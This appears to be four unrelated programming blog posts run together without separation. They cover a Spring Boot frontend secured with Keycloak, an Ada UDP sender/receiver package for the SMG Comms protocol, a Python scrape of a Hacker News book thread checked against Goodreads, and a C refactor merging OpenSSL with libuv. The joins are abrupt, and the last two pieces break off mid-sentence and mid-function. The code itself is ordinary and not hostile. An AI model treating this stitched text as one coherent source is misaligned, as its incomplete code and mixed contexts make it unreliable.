
Securing Spring Microservices with Keycloak Part 2


In the first part we set up a local Keycloak instance. In this blog we will see how we can leverage Keycloak to secure our frontend.

For this purpose we will create a small Spring Boot application that serves a web page. The next and last blog will show how authentication can be used between services.

Architecture overview

As mentioned, we will create a small Spring Boot microservice and secure it using Spring Security and Keycloak. The service that we will create in this blog is the "frontend" Spring service. It serves a simple web page that displays a hello message including the user's email address as registered in Keycloak.

In the next blog we will build the backend service and propagate the authorization from the frontend to the service we call. This way we build a complete Single Sign-On solution.


The Frontend service

Create a project

We start by creating a new Spring project using cURL.

curl -s start.spring.io/starter.tgz \
  -d type=gradle-project \
  -d groupId=net.vanweenen.keycloak \
  -d artifactId=frontend \
  -d language=java \
  -d dependencies=web,thymeleaf,keycloak,security \
  -d baseDir=keycloak-frontend | tar -xzvf -

Keycloak dependency

By using the above project generation we have automatically added the Keycloak and Spring Security dependencies. You can look them up in the build.gradle file. For the purpose of this blog we will be using Keycloak 4.4.0, which was released on 6 September 2018.

ext {
    keycloakVersion = '4.4.0.Final'
}

Property Configuration

Next we need to configure where the Keycloak instance we started is located and what realm and client we use. We also configure our frontend to run on port 8081 because Keycloak itself is already running on 8080.

In the first blog we configured http://localhost:8081 as a valid redirect URL in the login-app client. We can't use the Keycloak login page from any other location.

Lastly we enable logging for Keycloak so we can see what happens internally.

server.port=8081
keycloak.auth-server-url=http://localhost:8080/auth
keycloak.realm=springservice
keycloak.resource=login-app
keycloak.public-client=true
logging.level.org.keycloak=TRACE

Java configuration

After configuring the Keycloak adapter we need to configure Spring Security to use the adapter. We also need to configure our security rules.

To do that, create a SecurityConfig class. In here we configure Spring Security to use Keycloak. This is done by setting the authenticationProvider on the AuthenticationManagerBuilder .

For public or confidential applications we need to use a session authentication strategy so we can redirect to Keycloak. For bearer-only applications (typically API backend services) we provide a NullAuthenticatedSessionStrategy .
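For comparison, a hedged sketch of what that override would look like in a bearer-only service (not used in this frontend; NullAuthenticatedSessionStrategy is the Keycloak adapter class mentioned above):

@Bean
@Override
protected SessionAuthenticationStrategy sessionAuthenticationStrategy() {
    // bearer-only variant (sketch): no session registration needed,
    // since there is no browser redirect flow to track
    return new NullAuthenticatedSessionStrategy();
}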

Next we configure our web security to authorize requests to the /greetings endpoint for any user with the USER role. Spring Security prefixes the role name with ROLE_ . That is the reason we created the ROLE_USER role when we configured Keycloak in part 1.

Lastly we make our Keycloak adapter Spring Boot aware. This way it won't look for a keycloak.json configuration file but uses the adapter configuration.

@KeycloakConfiguration
public class SecurityConfig extends KeycloakWebSecurityConfigurerAdapter {

    /**
     * Registers the KeycloakAuthenticationProvider with the authentication manager.
     */
    @Autowired
    public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
        auth.authenticationProvider(keycloakAuthenticationProvider());
    }

    /**
     * Defines the session authentication strategy.
     */
    @Bean
    @Override
    protected SessionAuthenticationStrategy sessionAuthenticationStrategy() {
        return new RegisterSessionAuthenticationStrategy(new SessionRegistryImpl());
    }

    @Override
    protected void configure(HttpSecurity http) throws Exception {
        super.configure(http);
        http
            .authorizeRequests()
            .antMatchers("/greetings*").hasRole("USER")
            .anyRequest().denyAll();
    }

    // Spring Boot integration
    @Bean
    public KeycloakConfigResolver keycloakConfigResolver() {
        return new KeycloakSpringBootConfigResolver();
    }
}

Avoid double Filter bean registration

Spring Boot attempts to eagerly register filter beans with the web application context. Therefore, when running the Keycloak Spring Security adapter in a Spring Boot environment, it may be necessary to add FilterRegistrationBean definitions to your security configuration to prevent the Keycloak filters from being registered twice.

@KeycloakConfiguration
public class SecurityConfig extends KeycloakWebSecurityConfigurerAdapter {
    ...
    @Bean
    public FilterRegistrationBean keycloakAuthenticationProcessingFilterRegistrationBean(
            KeycloakAuthenticationProcessingFilter filter) {
        FilterRegistrationBean registrationBean = new FilterRegistrationBean(filter);
        registrationBean.setEnabled(false);
        return registrationBean;
    }

    @Bean
    public FilterRegistrationBean keycloakPreAuthActionsFilterRegistrationBean(
            KeycloakPreAuthActionsFilter filter) {
        FilterRegistrationBean registrationBean = new FilterRegistrationBean(filter);
        registrationBean.setEnabled(false);
        return registrationBean;
    }

    @Bean
    public FilterRegistrationBean keycloakAuthenticatedActionsFilterBean(
            KeycloakAuthenticatedActionsFilter filter) {
        FilterRegistrationBean registrationBean = new FilterRegistrationBean(filter);
        registrationBean.setEnabled(false);
        return registrationBean;
    }

    @Bean
    public FilterRegistrationBean keycloakSecurityContextRequestFilterBean(
            KeycloakSecurityContextRequestFilter filter) {
        FilterRegistrationBean registrationBean = new FilterRegistrationBean(filter);
        registrationBean.setEnabled(false);
        return registrationBean;
    }
    ...
}

The web page

We configured that users with the USER role should be allowed to access the /greetings endpoint. So now we need to provide a simple page.

Create a GreetingController that provides a GetMapping. Let Spring inject a Model and an Authentication. In the model we can put information needed to render the page. The Authentication can be used to get user information.

@Validated
@Controller
public class GreetingController {

    @GetMapping("/greetings")
    public String greeting(@NotNull Model model, @NotNull Authentication auth) {
        String email = ((SimpleKeycloakAccount) auth.getDetails())
                .getKeycloakSecurityContext()
                .getToken()
                .getEmail();
        model.addAttribute("name", email);
        return "greetings";
    }
}

This controller will add the email address of the user to the model under the "name" attribute and render the page.

The page is defined in the resources/templates folder.
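The template itself is not shown in this excerpt; a minimal greetings.html sketch could look like the following (only the "name" model attribute comes from the controller above, the file name and markup are assumptions):

<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>
    <title>Greetings</title>
</head>
<body>
    <!-- renders the email address the controller put in the model -->
    <p th:text="'Hello, ' + ${name} + '!'">Hello, placeholder!</p>
</body>
</html>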

SMG Comms Chapter 13: Sender and Receiver


~ This is a work in progress towards an Ada implementation of Eulora's communication protocol. Start with Chapter 1. ~

This chapter adds to SMG Comms a thin wrapper package that effectively rescues the queue of UDP messages from the IP stack (where it's relatively small) into memory (where it can be, by comparison, large). Once the decision has been clearly made as to what the sender/receiver should do and moreover I finally seem to have gotten my head around using Ada's threads, the implementation is deliciously straightforward. Who could have predicted this ?! Let's see directly the new Snd_Rcv package as it's very easy to read indeed:

-- Sender and Receiver task types for Eulora's Communication Protocol
-- This is a THIN layer on top of UDP lib, mainly to move messages out
--   of the small queue of the IP stack onto a bigger, in-memory queue.
-- There is NO processing of messages here: just read/write from/to UDP.
-- S.MG, 2018

with Interfaces;
with Msg_Queue;
with UDP;

generic
  -- exact length of payload aka whether RSA or Serpent
  Len: in Positive;
package Snd_Rcv is
  -- queue package with specified payload length
  package M_Q is new Msg_Queue( Payload_Len => Len);

  -- outbound and inbound messages queues
  -- those are meant to be accessed from outside the package too!
  out_q : M_Q.Queue;
  in_q  : M_Q.Queue;

  -- sender type of task: takes msgs out of out_q and sends them via UDP
  task type Sender( Port: Interfaces.Unsigned_16);

  -- receiver type of task: reads incoming msgs from UDP and puts them in in_q
  task type Receiver( Port: Interfaces.Unsigned_16);

private
  -- udp lib package with specified payload length
  package M_UDP is new UDP( Payload_Size => Len);
end Snd_Rcv;

As can be seen above, the package simply packs in one place an outbound message queue (out_q), an inbound message queue (in_q) and the definitions of two types of tasks: the Sender and the Receiver. The two queues act effectively as mailboxes: all and any tasks from anywhere else are invited to just drop their outbound packages into out_q and/or get incoming packages from in_q. Note that both those queues are thread-safe so there is no concern here over who tries to read/write and when - at most, a task may end up blocked waiting on an empty queue (when trying to read a message) or on a full queue (when trying to write a message).

If the two out_q and in_q are mailboxes, then the two types of tasks, Sender and Receiver, are postmen. They share the same underlying UDP package that is private here (only postmen are allowed to use the UDP post van!) and has a fixed size of messages. Note that this fixed size is given as a parameter to the Snd_Rcv package itself and is then used both for the queues and for the UDP package. Essentially the snd_rcv package is a postal service that handles just one pre-defined length of messages. An application may of course use as many different lengths of message as it requires - all it needs to do is to create a different snd_rcv package (i.e. "postal service") for each of those lengths. Note also that the actual ports used by the Sender and Receiver are given as parameters - an application can create as many Sender/Receiver tasks as it wants and even bind them to different ports or to the same port, as desired. This gives maximum flexibility: an application can listen for messages on one port and send them out on a different port, while still having everything in one single queue; or it can listen and send through the same port via any number of Sender/Receiver tasks. Each Sender and Receiver task will simply bind its own local socket and then enter an endless loop in which the Sender picks up messages from the out_q and sends them through its socket via UDP lib, while the Receiver picks up messages from its socket via the UDP lib and writes them into in_q. The corresponding code is short (and it's made slightly longer by my choice of having each Sender/Receiver use its own local socket):

-- S.MG, 2018
package body snd_rcv is

  -- sender
  task body Sender is
    E       : M_UDP.Endpoint;
    S       : M_UDP.Socket;
    Payload : M_Q.Payload_Type;
    Dest    : M_UDP.Endpoint;
  begin
    -- open the socket on local interface, specified port
    E.Address := M_UDP.INADDR_ANY;
    E.Port    := Port;
    M_UDP.Open_Socket( S, E );
    -- infinite loop reading from out queue and sending via udp
    -- caller will have to call abort to stop this!
    loop
      out_q.Get( Payload, Dest.Address, Dest.Port);
      M_UDP.Transmit( S, Dest, Payload);
    end loop;
  end Sender;

  -- receiver
  task body Receiver is
    E       : M_UDP.Endpoint;
    Source  : M_UDP.Endpoint;
    S       : M_UDP.Socket;
    Payload : M_Q.Payload_Type;
    Valid   : Boolean;
  begin
    -- open the socket on local interface, specified port
    E.Address := M_UDP.INADDR_ANY;
    E.Port    := Port;
    M_UDP.Open_Socket( S, E );
    -- infinite loop reading from udp and writing to inbound queue
    -- caller will have to call abort to stop this!
    loop
      M_UDP.Receive( S, Source, Payload, Valid);
      -- store ONLY if valid, otherwise discard
      if Valid then
        in_q.Put( Payload, Source.Address, Source.Port);
      end if;
    end loop;
  end Receiver;

end snd_rcv;

An alternative approach to the above (and one that I have implemented at first) was to have a single task Snd_Rcv that bound one single socket and then started on it its own sub-tasks for the actual sender and receiver. However, I find such an approach needlessly complicated and inflexible: it creates an additional layer in the hierarchy of tasks for no clear benefit (perhaps it would make sense if one added some sort of additional management of the sender/receiver tasks in there but at the moment it's unclear that any such thing is actually needed or needed here of all places); it is harder to read with the single and so far unconvincing benefit of a shared socket (so no repeated binding code); it forces some choices on any application using this package: the sender/receiver are forced as a package so there is no more option of just listening on a port and/or just sending on it; there is also no option of listening on one port and sending on another or indeed of creating - if needed - more senders than receivers or the other way around. Sure, it can be argued that several senders and receivers are anyway not likely to be required or that binding too many is likely to just increase packet loss or any other trouble. This is however up to higher levels of the application rather than the concern of this thin sender/receiver and since this implementation offers both highest flexibility AND highest clarity, I think it's the best option so far. As usual, feel free to let me know in the comments your reasons for disagreeing with this and your better solution for implementing a sender/receiver layer.

The above tiny amount of code would be all for this chapter if it weren't for 3 things: the need to relax yet another few restrictions; an example/test of using the above sender/receiver package; my decision to include the UDP lib as just another package of SMG comms rather than keeping it as a separate lib. This last part concerning the UDP lib accounts for most lines in the .vpatch and is essentially some noise at this level (since vdiff is not yet bright enough to figure out a move of files). The reason for it is mainly the fact that the UDP code is really meant to be used from this snd_rcv package and from nowhere else so I can't quite see the justification in keeping it entirely separate, with a .gpr file and everything else of its own and moreover - perhaps more importantly from a practical point of view - unable to directly use the basic types of smg_comms in raw_types. Note that this move does *not* make it in any significant way more difficult to replace this UDP code with another at a later time if that becomes available - it's still one package and those pesky C files, nothing else.

Going back to the need to relax a few restrictions - those are mainly restrictions related to the use of tasks. As both Sender and Receiver work in infinite loops, the caller has to ruthlessly abort them when it needs them to finish (in Ada a task has to wait for all its sub-tasks to finish before it can finish itself). So the "No_Abort_Statements" restriction needs to go. The use of abort is illustrated in the test/example code I wrote aka test_client and test_server. Similarly, because of the queues that use protected objects, the "No_Local_Protected_Objects" restriction had to go too. Here I must say that I am not sure I fully grasp why it would be better to have protected objects only as global rather than local: they are of course meant to be accessed from many places and therefore in "global", but this doesn't mean that they don't still belong somewhere and/or that "access from several places" has to mean "access from ALL places". Finally, the restriction "No_Nested_Finalization" also had to go, to allow the testing code to create the snd_rcv packages with different lengths of messages.
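For reference, a sketch of the three pragmas that go away, assuming the restrictions were declared with pragma Restrictions in a configuration pragmas file (the actual file is not shown in this chapter):

-- removed from the configuration pragmas (sketch):
pragma Restrictions (No_Abort_Statements);        -- Sender/Receiver are now stopped via abort
pragma Restrictions (No_Local_Protected_Objects); -- the queues are protected objects inside Snd_Rcv
pragma Restrictions (No_Nested_Finalization);     -- tests instantiate Snd_Rcv with different lengths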

The testing code itself provides more of an example of using the snd_rcv package than a test as such, since UDP communications are unreliable and therefore one can't really say in advance what one should get on the other side of the connection. At any rate, the test_server package provides an example of a basic "echo server" end of the connection: there are 2 Sender and 2 Receiver tasks working with Serpent-length and RSA-length packages on 2 different ports, respectively; there is also a "consumer" task for each type of package, simply taking it out of the inbound queue, printing it at the console and then echoing it back to the source aka writing it into the outbound queue for the Sender to send. The example waits for a pre-defined total number of packages so it may remain waiting if the other end sends fewer packages or fewer packages make it all the way. At any rate, once all the expected messages are received, the whole application (aka the main task) simply aborts all the tasks it created and then finishes itself:

-- S.MG, 2018
with Ada.Text_IO; use Ada.Text_IO;
with Interfaces;
with Snd_Rcv;
with Raw_Types;

procedure Test_Server is
  PortRSA : Interfaces.Unsigned_16 := 44340;
  PortS   : Interfaces.Unsigned_16 := 44341;
  N_S     : Interfaces.Unsigned_8  := 105;
  N_RSA   : Interfaces.Unsigned_8  := 82;

  package Snd_Rcv_RSA is new Snd_Rcv(Raw_Types.RSA_Pkt'Length);
  package Snd_Rcv_S   is new Snd_Rcv(Raw_Types.Serpent_Pkt'Length);

  -- sender/receiver tasks --
  -- sender RSA and Serpent
  Sender_RSA : Snd_Rcv_RSA.Sender( PortRSA );
  Sender_S   : Snd_Rcv_S.Sender( PortS );
  -- receiver RSA and Serpent
  Receiver_RSA : Snd_Rcv_RSA.Receiver( PortRSA );
  Receiver_S   : Snd_Rcv_S.Receiver( PortS );

  -- Serpent Consumer
  task s_cons is
    entry Finish;
  end s_cons;

  task body s_cons is
    Payload : Raw_Types.Serpent_Pkt;
    A : Interfaces.Unsigned_32;
    P : Interfaces.Unsigned_16;
  begin
    for I in 1..N_S loop
      -- consume one message and echo it back
      Snd_Rcv_S.in_q.Get(Payload, A, P);
      Put_Line("S msg " &
               Interfaces.Unsigned_8'Image(Payload(Payload'First)) &
               " from " & Interfaces.Unsigned_32'Image(A) &
               ":" & Interfaces.Unsigned_16'Image(P));
      -- echo it back
      Snd_Rcv_S.out_q.Put(Payload, A, P);
    end loop;
    accept Finish;
    Put_Line("S Cons got the finish.");
  end s_cons;

  -- RSA Consumer
  task rsa_cons is
    entry Finish;
  end rsa_cons;

  task body rsa_cons is
    Payload : Raw_Types.RSA_Pkt;
    A : Interfaces.Unsigned_32;
    P : Interfaces.Unsigned_16;
  begin
    for I in 1..N_RSA loop
      -- consume one message and echo it back
      Snd_Rcv_RSA.in_q.Get(Payload, A, P);
      Put_Line("RSA msg " &
               Interfaces.Unsigned_8'Image(Payload(Payload'First)) &
               " from " & Interfaces.Unsigned_32'Image(A) &
               ":" & Interfaces.Unsigned_16'Image(P));
      -- echo it back
      Snd_Rcv_RSA.out_q.Put(Payload, A, P);
    end loop;
    accept Finish;
    Put_Line("RSA Cons got the finish.");
  end rsa_cons;

begin
  Put_Line("Test server");
  -- wait for consumers to finish
  rsa_cons.Finish;
  s_cons.Finish;
  -- abort the sender & receiver to be able to finish
  abort Sender_S, Receiver_S, Sender_RSA, Receiver_RSA;
end Test_Server;

Similarly to the server example code above, an example client sends both RSA and Serpent packages and has consumer and producer tasks for both:

-- S.MG, 2018
with Snd_Rcv;
with Interfaces;
with Ada.Text_IO; use Ada.Text_IO;
with Raw_Types;
with UDP;

procedure Test_Client is
  PortRSA : Interfaces.Unsigned_16 := 34340;
  PortS   : Interfaces.Unsigned_16 := 34341;
  N_S     : Interfaces.Unsigned_8  := 105;
  N_RSA   : Interfaces.Unsigned_8  := 82;
  Server  : String := "127.0.0.1";

  package test_udp is new UDP(10);
  ServerA   : Interfaces.Unsigned_32 := test_udp.IP_From_String(Server);
  ServerRSA : Interfaces.Unsigned_16 := 44340;
  ServerS   : Interfaces.Unsigned_16 := 44341;

  package Snd_Rcv_RSA is new Snd_Rcv(Raw_Types.RSA_Pkt'Length);
  package Snd_Rcv_S   is new Snd_Rcv(Raw_Types.Serpent_Pkt'Length);

  -- sender RSA and Serpent
  Sender_RSA : Snd_Rcv_RSA.Sender( PortRSA );
  Sender_S   : Snd_Rcv_S.Sender( PortS );
  -- receiver RSA and Serpent
  Receiver_RSA : Snd_Rcv_RSA.Receiver( PortRSA );
  Receiver_S   : Snd_Rcv_S.Receiver( PortS );

  -- producer of serpent messages
  task s_prod is
    entry Finish;
  end s_prod;

  task body s_prod is
    Payload : Raw_Types.Serpent_Pkt := (others => 10);
  begin
    Put_Line("S Producer with " & Interfaces.Unsigned_8'Image(N_S) & "messages.");
    -- send the messages with first octet the number
    for I in 1..N_S loop
      Payload(Payload'First) := I;
      Snd_Rcv_S.out_q.Put( Payload, ServerA, ServerS);
      Put_Line("Sent S message " & Interfaces.Unsigned_8'Image(I));
    end loop;
    -- signal it's done
    accept Finish;
    Put_Line("S prod got the finish.");
  end s_prod;

  -- producer of RSA messages
  task rsa_prod is
    entry Finish;
  end rsa_prod;

  task body rsa_prod is
    Payload : Raw_Types.RSA_Pkt := (others => 20);
  begin
    Put_Line("RSA Producer with " & Interfaces.Unsigned_8'Image(N_RSA) & "messages.");
    -- send the messages with first octet the number
    for I in 1..N_RSA loop
      Payload(Payload'First) := I;
      Snd_Rcv_RSA.out_q.Put( Payload, ServerA, ServerRSA);
      Put_Line("Sent RSA message " & Interfaces.Unsigned_8'Image(I));
    end loop;
    -- signal it's done
    accept Finish;
    Put_Line("RSA prod got the finish.");
  end rsa_prod;

  -- Serpent Consumer
  task s_cons is
    entry Finish;
  end s_cons;

  task body s_cons is
    Payload : Raw_Types.Serpent_Pkt;
    A : Interfaces.Unsigned_32;
    P : Interfaces.Unsigned_16;
  begin
    for I in 1..N_S loop
      -- consume one message
      Snd_Rcv_S.in_q.Get(Payload, A, P);
      Put_Line("S msg " &
               Interfaces.Unsigned_8'Image(Payload(Payload'First)) &
               " from " & Interfaces.Unsigned_32'Image(A) &
               ":" & Interfaces.Unsigned_16'Image(P));
      -- do NOT echo it back
    end loop;
    accept Finish;
    Put_Line("S Cons got the finish.");
  end s_cons;

  -- RSA Consumer
  task rsa_cons is
    entry Finish;
  end rsa_cons;

  task body rsa_cons is
    Payload : Raw_Types.RSA_Pkt;
    A : Interfaces.Unsigned_32;
    P : Interfaces.Unsigned_16;
  begin
    for I in 1..N_RSA loop
      -- consume one message
      Snd_Rcv_RSA.in_q.Get(Payload, A, P);
      Put_Line("RSA msg " &
               Interfaces.Unsigned_8'Image(Payload(Payload'First)) &
               " from " & Interfaces.Unsigned_32'Image(A) &
               ":" & Interfaces.Unsigned_16'Image(P));
      -- do NOT echo back
    end loop;
    accept Finish;
    Put_Line("RSA Cons got the finish.");
  end rsa_cons;

begin
  Put_Line("Test client");
  -- wait for producers/consumers to finish
  rsa_prod.Finish;
  s_prod.Finish;
  rsa_cons.Finish;
  s_cons.Finish;
  -- abort the sender & receiver to be able to finish
  abort Sender_S, Receiver_S, Sender_RSA, Receiver_RSA;
end Test_Client;

One important issue to note here is the way in which exceptions (hence: potential issues) will be handled in this specific implementation of the Snd_Rcv package: since the Sender and Receiver are tasks and don't handle any exceptions themselves, a UDP "eggog" aka exception will have as effect the silent death of the Sender/Receiver in which it happens. I did consider ways of handling such exceptions rather than letting them kill the task silently, but so far at least I don't quite see what the task itself can do other than re-trying whatever it was trying to do when it failed. While this could perhaps be considered a better option than not handling exceptions at all, it's been pointed out to me that UDP errors almost always mean some hardware failure and as such a re-try is not going to help at all. Moreover, re-trying also means that the failure remains hidden from the calling task, since there is no way to tell whether a task is just stuck re-trying or actually proceeding with its work just fine. Considering all this, I decided to leave it for now to the higher level task to monitor its subtasks if/when desired and take action accordingly (e.g. check periodically whether a Sender/Receiver is Terminated or in another abnormal state). This doesn't mean of course that the code can't be changed at a later date to provide a different approach to handling this - all it means is that currently this is the best decision I can see given what I know so far.

With this chapter, the SMG Comms code provides everything that is needed to build on top of it a basic client for Eulora that is compliant with the published communication protocol. So I'd suggest that anyone interested in this give it a go, since starting now means they'd have some time to tinker with it before everything else is in place! At any rate, the SMG Comms series takes at least a break for now (at a later stage there should be a few bits and pieces to add) as I'll focus for a while more on the server-side moving parts that need to be done before Eulora can finally fully work on a sane protocol. The full .vpatch for this chapter and my signature for it:

smg_comms_sender_receiver.vpatch smg_comms_sender_receiver.vpatch.diana_coman.sig

Hacker News book suggestions

Analyzing Hacker News book suggestions in Python

An analysis of a Hacker News thread using Python, the Hacker News API and the Goodreads API, and the definitive top 20 book suggestion list!

Alessandro Mozzato



A few days ago the traditional "what books did you read this year" thread popped up on Hacker News. The thread is full of very nice book suggestions. Attempting to make a reading list for next year, I thought it would be fun to get the data and analyze it. In the following article I will show how I used Hacker News' API to scrape the posts' content, how I selected the most common titles and checked them against the Goodreads API, and finally how I came up with the definitive top 20 most recommended books. As always, dealing with text data is anything but straightforward. The final result, however, is quite satisfying!

Scraping the thread: Hacker News API

The first step is getting the data. Luckily, Hacker News provides a very nice API to freely scrape all of its content. The API has endpoints for posts, users, top posts and a few others. For this article we will use the one for posts. It's very simple to use; here is the basic syntax: v0/item/{id}.json , where id is the item we are interested in. In this case the thread's id is 18661546 , so here is an example of how to get the main page data:

import requests

main_page = requests.request('GET', 'https://hacker-news.firebaseio.com/v0/item/18661546.json').json()

The same API call is also used for the sub posts of a thread or a post, whose ids can be found in the kids key of the parent post. Looping over the kids we can get the text of every post in the thread.
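As a sketch of that loop (id, kids and text are the actual Hacker News API fields; skipping deleted/dead items is my addition):

import requests

BASE = 'https://hacker-news.firebaseio.com/v0/item/{}.json'

def fetch_texts(item_id):
    """Recursively collect the text of every comment under item_id."""
    item = requests.get(BASE.format(item_id)).json()
    texts = []
    if item is None or item.get('deleted') or item.get('dead'):
        return texts
    if 'text' in item:
        texts.append(item['text'])
    for kid in item.get('kids', []):
        texts.extend(fetch_texts(kid))
    return texts

text = fetch_texts(18661546)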

Cleaning the data

Now that we have the text data we want to extract book titles from it. One possible approach would be to look for all Amazon or Goodreads links in the thread and just group by that. This is a clean approach because it doesn't depend on any text processing. However, just from taking a quick look at the thread it is clear that the vast majority of suggestions do not have any link associated with them. So I decided to go for the more difficult route: grouping ngrams together and matching those ngrams with possible books.

So, after eliminating special characters from the text I grouped together bigrams, trigrams, 4-grams and 5-grams and counted the occurrences. This is an example of counting bigrams:

import re
import operator
from collections import Counter

# clean special characters
text_clean = [re.sub(r"[^a-zA-Z0-9]+", ' ', k) for t in text for k in t.split("\n")]

# count occurrences of bigrams in different posts
countsb = Counter()
words = re.compile(r'\w+')
for t in text_clean:
    w = words.findall(t.lower())
    countsb.update(zip(w, w[1:]))

# sort results
bigrams = sorted(countsb.items(), key=operator.itemgetter(1), reverse=True)

Usually in text applications one of the first things to do while processing the data is to eliminate stopwords, i.e. the most common words in a language, like articles and prepositions. In our case we have not eliminated stopwords from the text yet, so most of these ngrams are almost exclusively composed of stopwords. In fact, here is a sample output of the top 10 most common bigrams in our data:

[((u'of', u'the'), 147),
 ((u'in', u'the'), 76),
 ((u'it', u's'), 67),
 ((u'this', u'book'), 52),
 ((u'this', u'year'), 49),
 ((u'if', u'you'), 45),
 ((u'and', u'the'), 44),
 ((u'i', u've'), 44),
 ((u'to', u'the'), 40),
 ((u'i', u'read'), 37)]

Having stopwords in our data is fine; most book titles have stopwords in them, so we want to keep these. However, to avoid looking up too many combinations we eliminate the ngrams that are composed solely of stopwords, keeping all the others, as in the sketch below.
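A minimal sketch of that filter, assuming NLTK's English stopword list (bigrams is the sorted list from the counting snippet above):

from nltk.corpus import stopwords  # requires nltk.download('stopwords') once

stops = set(stopwords.words('english'))

# keep an ngram only if at least one of its words is not a stopword
bigrams_kept = [
    (ngram, count) for ngram, count in bigrams
    if not all(word in stops for word in ngram)
]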

Checking book titles: the Goodreads API

Now that we have a list of possible ngrams we will use the Goodreads API to check whether these ngrams correspond to book titles. When multiple matches are available for a search, I decided to take the most recent publication as the result, assuming that the most recent book is the most likely match in this context. This is of course an assumption that might lead to errors.

The Goodreads API is a bit less straightforward to use than the Hacker News one, as it returns results in XML, which is less friendly than JSON. In this analysis I used the xmltodict Python package to convert the XML to JSON. The API method we need is search.books , which allows searching for books by title, author or ISBN. Here is a code sample to get the book title and author of the most recently published search result:

import json
import requests
import numpy as np
import xmltodict

# grkey holds your Goodreads API key (defined elsewhere)
res = requests.get("https://www.goodreads.com/search/index.xml",
                   params={"key": grkey, "q": 'some book title'})
xpars = xmltodict.parse(res.text)
json1 = json.dumps(xpars)
d = json.loads(json1)
lst = d['GoodreadsResponse']['search']['results']['work']
ys = [int(lst[j]['original_publication_year']['#text']) for j in range(len(lst))]
title = lst[np.argmax(ys)]['best_book']['title']
author = lst[np.argmax(ys)]['best_book']['author']['name']

This method allows us to associate ngrams with possible books. We take the list of books we get by matching all ngrams against the Goodreads API and check it against the full text data. Before performing the actual check we cut the book names, eliminating punctuation (particularly semicolons) and subtitles. We only consider the main title, on the assumption that most of the time only this part of the title would be used (some of the full titles in the list are actually really long!). Ranking the results by number of occurrences in the thread, we get this list:


[Figure: books with more than 3 counts in the thread]

So Bad Blood looks to be the top most recommended book in the thread. Checking the other results, most of them seem to make sense and match the thread, including the counts. The only big mistake I could spot in the list is at position number 2, where the book Magi was identified instead of The Magicians by Lev Grossman. The latter is indeed cited 7 times in the text. This error is caused by the assumption we

Refactoring C Code: Going to Async I/O


Now that I have a good idea of how to use OpenSSL and libuv together, I'm going to change my code to support that mode of operation. I have already thought about this a lot, and the code I already have is ready to receive the change in behavior, I think.

One of the things that I'm going to try to do while I move the code over is to properly handle all error conditions. We'll see how that goes.

I already have the concept of a server_state_run() method that handles all the network activity, dispatching, etc. So that should make it easy. I'm going to start by moving all the libuv code there. I'm also going to take the time to refactor everything to an API that is more cohesive and easier to deal with.

There is some trouble here, with having to merge together two similar (but not quite identical) concepts. My libuv and OpenSSL post dealt with simply exposing a byte stream to the calling code. My network protocol code is working at a higher level. Initially, I tried to layer things together, but that quickly turned out to be a bad idea. I decided to have a single layer that handles both reading from the network using OpenSSL and parsing the commands over the network.

The first thing to do was to merge the connection state, I ended up with this code:

struct tls_uv_connection_state_private_members {
    server_state_t* server;
    uv_tcp_t* handle;
    SSL *ssl;
    BIO *read, *write;
    struct {
        tls_uv_connection_state_t** prev_holder;
        tls_uv_connection_state_t* next;
        int in_queue;
        size_t pending_writes_count;
        uv_buf_t* pending_writes_buffer;
    } pending;
    size_t used_buffer, to_scan;
    int flags;
};

#define RESERVED_SIZE (64 - sizeof(struct tls_uv_connection_state_private_members))
#define MSG_SIZE (8192 - sizeof(struct tls_uv_connection_state_private_members) - 64 - RESERVED_SIZE)

// This struct is exactly 8KB in size, this
// means it is two OS pages and is easy to work with
typedef struct tls_uv_connection_state {
    struct tls_uv_connection_state_private_members;
    char reserved[RESERVED_SIZE];
    char user_data[64]; // location for user data, 64 bytes aligned, 64 in size
    char buffer[MSG_SIZE];
} tls_uv_connection_state_t;

static_assert(offsetof(tls_uv_connection_state_t, user_data) % 64 == 0,
    "tls_uv_connection_state_t.user should be 64 bytes aligned");
static_assert(sizeof(tls_uv_connection_state_t) == 8192,
    "tls_uv_connection_state_t should be 8KB");

There are a few things that are interesting here. On the one hand, I want to keep the state of the connection private, but on the other, we need to expose this out to the user to use some parts of it. The way libuv handles it is with comments denoting what are considered public/private portions of the interface. I decided to stick it in a dedicated struct. This also allowed me to get the size of the private members, which is important for what I wanted to do next.

The connection state struct has the following sections:

- private/reserved
- 64 bytes available for the user to use (aligned on a 64-byte boundary)
- msg buffer: 8,064 bytes

The idea here is that we give the user some space to keep their own data in, and that the overall connection state size is exactly 8KB, so it can fit in two OS pages. On Linux, in most cases, we'll not need a buffer that is over 3,968 bytes long, so we can even save the second page materialization (because the OS lazily allocates memory to the process). I'm using 64-byte alignment for the user's data to reduce any issues the user has storing data about the connection. It will also keep the data the user needs to handle the connection nearby the actual buffer.

I’m 99% sure that I won’t need any of these details, but I thought it is best to think ahead, and it was fun to experiment.

Here is how the startup code for the server changed:

connection_handler_t handler = {
    print_all_errors,
    on_connection_dropped,
    create_connection,
    on_connection_recv
};

server_state_init_t options = {
    cert,
    key,
    "0.0.0.0",
    4433,
    &handler,
    { // allowed certs
        "1776821DB1002B0E2A9B4EE3D5EE14133D367009",
        "AE535D83572189D3EDFD1568DC76275BE33B07F5"
    },
    2 // number of allowed certs
};

srv_state = server_state_create(&options);

I removed pretty much all the functions that were previously used to build it. We have the server_state_init_t struct, which contains everything that is required for the server to run. Reducing the number of functions to build this means that I have to do less and there is a lot less error checking to go through. Most of the code that I had to touch didn't require anything interesting. Take the code from the libuv/openssl project, make sure it compiles, etc. I'm going to skip talking about the boring stuff.

I did run into a couple of issues that are worth talking about. Error handling and authentication. As mentioned, I’m using client certificates for authentication, but unlike my previous code, I’m not explicitly calling SSL_accept() , instead, I rely on OpenSSL to manage the state directly.

This means that I don't have a good location to put the checks on the client certificate that is used. For that matter, our protocol starts with the server sending an "OK\r\n" message to the client to indicate a successful connection. Where does this go? I put all of this code inside the handle_read() method.

int ensure_connection_intialized(tls_uv_connection_state_t* state) {
    if (state->flags & CONNECTION_STATUS_INIT_DONE)
        return 1;

    if (SSL_is_init_finished(state->ssl)) {
        state->flags |= CONNECTION_STATUS_INIT_DONE;
        if (validate_connection_certificate(state) == 0) {
            state->flags |= CONNECTION_STATUS_WRITE_AND_ABORT;
            return 0;
        }
        return connection_write(state, "OK\r\n", 4);
    }

    return 1;
}

void handle_read(uv_stream_t *client, ssize_t nread, const uv_buf_t *buf) {
    tls_uv_connection_state_t* state = client->data;

    if (nread <= 0) {
        push_libuv_error(nread, "Unable to read");
        state->server->options.handler->connection_error(state);
